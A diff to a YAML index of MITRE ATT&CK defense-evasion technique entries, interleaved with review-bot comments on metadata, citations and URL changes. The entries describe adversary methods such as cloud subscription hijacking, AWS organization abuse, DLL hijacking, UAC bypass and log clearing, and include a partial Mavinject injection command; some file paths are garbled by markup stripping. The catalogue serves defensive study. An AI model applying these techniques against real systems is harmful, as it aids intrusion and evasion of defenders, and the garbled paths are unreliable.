- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1006:
technique:
@@ -870,12 +883,87 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1006
atomic_tests: []
+ T1666:
+ technique:
+ modified: '2024-09-25T16:15:41.224Z'
+ name: Modify Cloud Resource Hierarchy
+ description: "Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service
+ (IaaS) environments in order to evade defenses. \n\nIaaS environments often
+ group resources into a hierarchy, enabling improved resource management and
+ application of policies to relevant groups. Hierarchical structures differ
+ among cloud providers. For example, in AWS environments, multiple accounts
+ can be grouped under a single organization, while in Azure environments, multiple
+ subscriptions can be grouped under a single management group.(Citation: AWS
+ Organizations)(Citation: Microsoft Azure Resources)\n\nAdversaries may add,
+ delete, or otherwise modify resource groups within an IaaS hierarchy. For
+ example, in Azure environments, an adversary who has gained access to a Global
+ Administrator account may create new subscriptions in which to deploy resources.
+ They may also engage in subscription hijacking by transferring an existing
+ pay-as-you-go subscription from a victim tenant to an adversary-controlled
+ tenant. This will allow the adversary to use the victim’s compute resources
+ without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm
+ 2023)(Citation: Microsoft Subscription Hijacking 2022)\n\nIn AWS environments,
+ adversaries with appropriate permissions in a given account may call the `LeaveOrganization`
+ API, causing the account to be severed from the AWS Organization to which
+ it was tied and removing any Service Control Policies, guardrails, or restrictions
+ imposed upon it by its former Organization. Alternatively, adversaries may
+ call the `CreateAccount` API in order to create a new account within an AWS
+ Organization. This account will use the same payment methods registered to
+ the payment account but may not be subject to existing detections or Service
+ Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ type: attack-pattern
+ id: attack-pattern--0ce73446-8722-4086-9d43-514f1d0f669e
+ created: '2024-09-25T14:16:19.234Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1666
+ external_id: T1666
+ - source_name: AWS Organizations
+ description: AWS. (n.d.). Terminology and concepts for AWS Organizations.
+ Retrieved September 25, 2024.
+ url: https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+ - source_name: Microsoft Subscription Hijacking 2022
+ description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
+ using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
+ url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
+ - source_name: Microsoft Azure Resources
+ description: Microsoft Azure. (2024, May 31). Organize your Azure resources
+ effectively. Retrieved September 25, 2024.
+ url: https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-setup-guide/organize-resources
+ - source_name: Microsoft Peach Sandstorm 2023
+ description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
+ password spray campaigns enable intelligence collection at high-value targets.
+ Retrieved September 18, 2023.
+ url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1564.008:
technique:
- modified: '2023-10-16T16:41:53.957Z'
+ modified: '2024-10-15T15:56:27.592Z'
name: 'Hide Artifacts: Email Hiding Rules'
description: |-
Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule
or Set-InboxRule
[PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)
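Review bot: the new T1666 block lands with `x_mitre_detection: ''`, a single data source (`Cloud Service: Cloud Service Modification`) and `atomic_tests: []`, even though its own description names the control-plane operations a defender would watch for (`LeaveOrganization`, `CreateAccount`, a pay-as-you-go subscription transferred out of the tenant). Because this block mirrors upstream ATT&CK verbatim the empty detection field should not be hand-edited here, but the index now advertises a defense-evasion technique with nothing actionable attached; worth a tracking issue for test coverage. On the mechanical side the block is internally consistent: all five `(Citation: ...)` keys in the description (`AWS Organizations`, `Microsoft Azure Resources`, `Microsoft Peach Sandstorm 2023`, `Microsoft Subscription Hijacking 2022`, `AWS RE:Inforce Threat Detection 2024`) have a matching `source_name` entry, `created` precedes `modified`, and the `external_id`/`url` pair agrees with the `T1666:` key.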
@@ -901,11 +989,10 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
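Review bot: `Office 365` and `Google Workspace` are dropped from T1564.008's platforms in favour of the single `Office Suite` value, with the version bump to `1.4` to match, and the same consolidation hits T1564 (`Office Suite`) and T1484.002 (`Azure AD` + `SaaS` to `Identity Provider`) further down. Any per-platform index or filter in this repository that still selects on the literal strings `Office 365`, `Google Workspace`, `Azure AD` or `SaaS` will silently lose these techniques after this change, so please make sure the platform-specific index files are regenerated from the same run (or their platform keys updated) rather than left at the old names.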
@@ -950,12 +1037,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.008
atomic_tests: []
T1027.013:
technique:
- modified: '2024-04-19T04:03:07.164Z'
+ modified: '2024-10-15T16:32:45.108Z'
name: Encrypted/Encoded File
description: "Adversaries may encrypt or encode files to obfuscate strings,
bytes, and other specific patterns to impede detection. Encrypting and/or
@@ -1026,11 +1112,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:50.568Z'
name: Rootkit
description: "Adversaries may use rootkits to hide the presence of programs,
files, network connections, services, drivers, and other system components.
@@ -1098,7 +1183,6 @@ defense-evasion:
url: https://en.wikipedia.org/wiki/Rootkit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1014
atomic_tests: []
T1036.007:
@@ -1129,7 +1213,7 @@ defense-evasion:
url: https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/
description: Seqrite. (n.d.). How to avoid dual attack and vulnerable files
with double extension?. Retrieved July 27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T21:09:59.588Z'
name: 'Masquerading: Double File Extension'
description: "Adversaries may abuse a double extension in the filename as a
means of masquerading the true file type. A file name may include a secondary
@@ -1166,13 +1250,11 @@ defense-evasion:
x_mitre_data_sources:
- 'File: File Creation'
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1036.007
atomic_tests: []
T1548.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:35:39.112Z'
name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
description: |-
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -1273,7 +1355,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.002
atomic_tests: []
T1548.003:
@@ -1304,7 +1385,7 @@ defense-evasion:
description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
Does. Retrieved March 19, 2018.
source_name: cybereason osx proton
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-14T16:28:19.781Z'
name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
description: |-
Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -1338,13 +1419,11 @@ defense-evasion:
- User
x_mitre_effective_permissions:
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1548.003
atomic_tests: []
T1578:
technique:
- modified: '2023-09-05T20:45:22.041Z'
+ modified: '2024-09-30T13:28:37.414Z'
name: Modify Cloud Compute Infrastructure
description: |-
An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.
@@ -1396,12 +1475,11 @@ defense-evasion:
- source_name: Mandiant M-Trends 2020
description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
2020.
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1542.001:
technique:
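Review bot: the Mandiant M-Trends 2020 reference swaps its URL from `content.fireeye.com/m-trends/rpt-m-trends-2020` to a `mandiant.com` PDF but keeps `Retrieved April 24, 2020`, which is inconsistent with the other URL swaps on this page (the two `twitter.com` to `x.com` changes and the Deloitte Drive link) where the retrieved date was moved to September 2024 alongside the new location. A 2020 retrieval date cannot apply to a `/2021-09/` path; if the generator is emitting upstream data as-is this is an upstream nit, otherwise the date should track the URL.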
@@ -1481,12 +1559,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1542.001
atomic_tests: []
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -1505,7 +1582,6 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -1519,7 +1595,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -1546,8 +1621,8 @@ defense-evasion:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -1578,7 +1653,8 @@ defense-evasion:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests: []
T1542.003:
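Review bot: for T1574.011 the keys `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` are removed from their old positions in the two preceding hunks (after `phase_name: defense-evasion` and after `x_mitre_is_subtechnique: true`) and re-emitted here at the end of the block, with the spec version bumped from `2.1.0` to `3.2.0`. The move is harmless to any YAML consumer but it turns a one-line version bump into three hunks and obscures what actually changed; emitting keys in a stable, sorted order from the generator would keep future diffs to the real deltas. Note also that this is the only entry on the page where a removed `2.1.0` comes back as `3.2.0`; elsewhere the `2.1.0` key is simply dropped.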
@@ -1635,7 +1711,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1218.013:
technique:
@@ -1688,7 +1763,7 @@ defense-evasion:
PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would
inject an import table entry consisting of the specified DLL into the module
at the given base address.(Citation: Mavinject Functionality Deconstructed)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T17:35:08.315Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Mavinject
x_mitre_detection: |-
@@ -1704,11 +1779,10 @@ defense-evasion:
- 'Process: Process Creation'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.005:
technique:
- modified: '2023-09-14T21:12:48.409Z'
+ modified: '2024-09-12T19:30:45.064Z'
name: 'Masquerading: Match Legitimate Name or Location'
description: |-
Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
@@ -1754,8 +1828,8 @@ defense-evasion:
external_id: T1036.005
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Docker Images
description: Docker. (n.d.). Docker Images. Retrieved April 6, 2021.
url: https://docs.docker.com/engine/reference/commandline/images/
@@ -1765,9 +1839,8 @@ defense-evasion:
url: https://www.elastic.co/blog/how-hunt-masquerade-ball
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.005
atomic_tests: []
T1600:
@@ -1794,7 +1867,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:37:49.258Z'
name: Weaken Encryption
description: |-
Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)
@@ -1818,8 +1891,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1036.008:
technique:
@@ -1883,11 +1954,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564:
technique:
- modified: '2024-03-29T17:45:48.126Z'
+ modified: '2024-10-15T15:58:49.815Z'
name: Hide Artifacts
description: |-
Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
@@ -1908,8 +1978,8 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Metadata'
- 'Application Log: Application Log Content'
@@ -1953,12 +2023,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564
atomic_tests: []
T1484.002:
technique:
- modified: '2024-04-19T04:27:51.388Z'
+ modified: '2024-09-25T13:50:11.593Z'
name: Domain Trust Modification
description: "Adversaries may add new domain trusts, modify the properties of
existing domain trusts, or otherwise change the configuration of trust relationships
@@ -1978,9 +2047,14 @@ defense-evasion:
trust modifications such as altering the claim issuance rules to log in any
valid set of credentials as a specified user.(Citation: AADInternals zure
AD Federated Domain) \n\nAn adversary may also add a new federated identity
- provider to an identity tenant such as Okta, which may enable the adversary
- to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
- 2023)"
+ provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+ may enable the adversary to authenticate as any user of the tenant.(Citation:
+ Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+ gain broad access into a variety of cloud-based services that leverage the
+ identity tenant. For example, in AWS environments, an adversary that creates
+ a new identity provider for an AWS Organization will be able to federate into
+ all of the AWS Organization member accounts without creating identities for
+ each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
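Review bot: the appended sentences for T1484.002 cite `(Citation: AWS RE:Inforce Threat Detection 2024)`, and the matching `source_name` is added to this entry's `external_references` in a later hunk on this page, so the new citation resolves and the `x_mitre_version` bump to `2.1` in the next hunk is consistent with the description change. One thing in the retained context worth flagging for upstream rather than fixing here: the key `AADInternals zure AD Federated Domain` on the unchanged line reads like a typo for `Azure`, but since citation keys must match `source_name` values exactly it should only be touched if the upstream ATT&CK data changes it too.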
@@ -2000,9 +2074,8 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '2.0'
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -2019,6 +2092,10 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1484/002
external_id: T1484.002
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
- source_name: CISA SolarWinds Cloud Detection
description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -2052,7 +2129,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.002
atomic_tests: []
T1562.009:
@@ -2102,7 +2178,7 @@ defense-evasion:
url: https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg
description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
30, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-31T14:51:47.352Z'
name: 'Impair Defenses: Safe Boot Mode'
description: |-
Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)
@@ -2130,8 +2206,6 @@ defense-evasion:
- Anti-virus
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1562.009
atomic_tests: []
T1542.005:
@@ -2174,7 +2248,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
Information. Retrieved October 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T16:35:53.806Z'
name: TFTP Boot
description: |-
Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -2198,12 +2272,10 @@ defense-evasion:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1497.001:
technique:
- modified: '2024-04-19T12:49:40.919Z'
+ modified: '2024-09-12T15:50:18.047Z'
name: 'Virtualization/Sandbox Evasion: System Checks'
description: "Adversaries may employ various system checks to detect and avoid
virtualization and analysis environments. This may include changing behaviors
@@ -2293,13 +2365,12 @@ defense-evasion:
url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
- source_name: Deloitte Environment Awareness
description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1497.001
atomic_tests: []
T1070.002:
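Review bot: the Deloitte "Environment Awareness" reference changes from `https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc` to the same file id with `/edit` appended. For a Drive file the usual anonymous share form is `/view`; `/edit` is the form Google emits for documents opened with edit access, so please confirm the new URL resolves for a reader who is not signed in with edit permission, since the retrieved date was explicitly moved to September 13, 2024 on the strength of that link.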
@@ -2323,7 +2394,7 @@ defense-evasion:
url: https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/
description: Marcel. (2018, April 19). 12 Critical Linux Log Files You Must
be Monitoring. Retrieved March 29, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T21:23:51.886Z'
name: 'Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs'
description: |
Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the /var/log/
directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
@@ -2348,8 +2419,6 @@ defense-evasion:
- 'File: File Deletion'
- 'File: File Modification'
- 'Command: Command Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1070.002
atomic_tests: []
T1218.004:
@@ -2378,7 +2447,7 @@ defense-evasion:
- source_name: LOLBAS Installutil
url: https://lolbas-project.github.io/lolbas/Binaries/Installutil/
description: LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:47:52.603Z'
name: 'Signed Binary Proxy Execution: InstallUtil'
description: |-
Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe
and C:\Windows\Microsoft.NET\Framework64\v\InstallUtil.exe
.
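Review bot: in the retained context the InstallUtil paths come out as `C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe` and `C:\Windows\Microsoft.NET\Framework64\v\InstallUtil.exe`, i.e. with nothing between `v` and the next backslash, and the closing `.` of the sentence on its own line. That is most likely an angle-bracketed version placeholder swallowed as markup by the same stripping that breaks the other inline code spans on this page; a practitioner who copies the path as rendered gets one that does not exist. Not introduced by this hunk, but a good candidate for the generator fix since it changes the meaning of the text rather than just its layout.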
@@ -2404,8 +2473,6 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.004
atomic_tests: []
T1027.008:
@@ -2457,18 +2524,17 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -2484,8 +2550,8 @@ defense-evasion:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -2499,7 +2565,7 @@ defense-evasion:
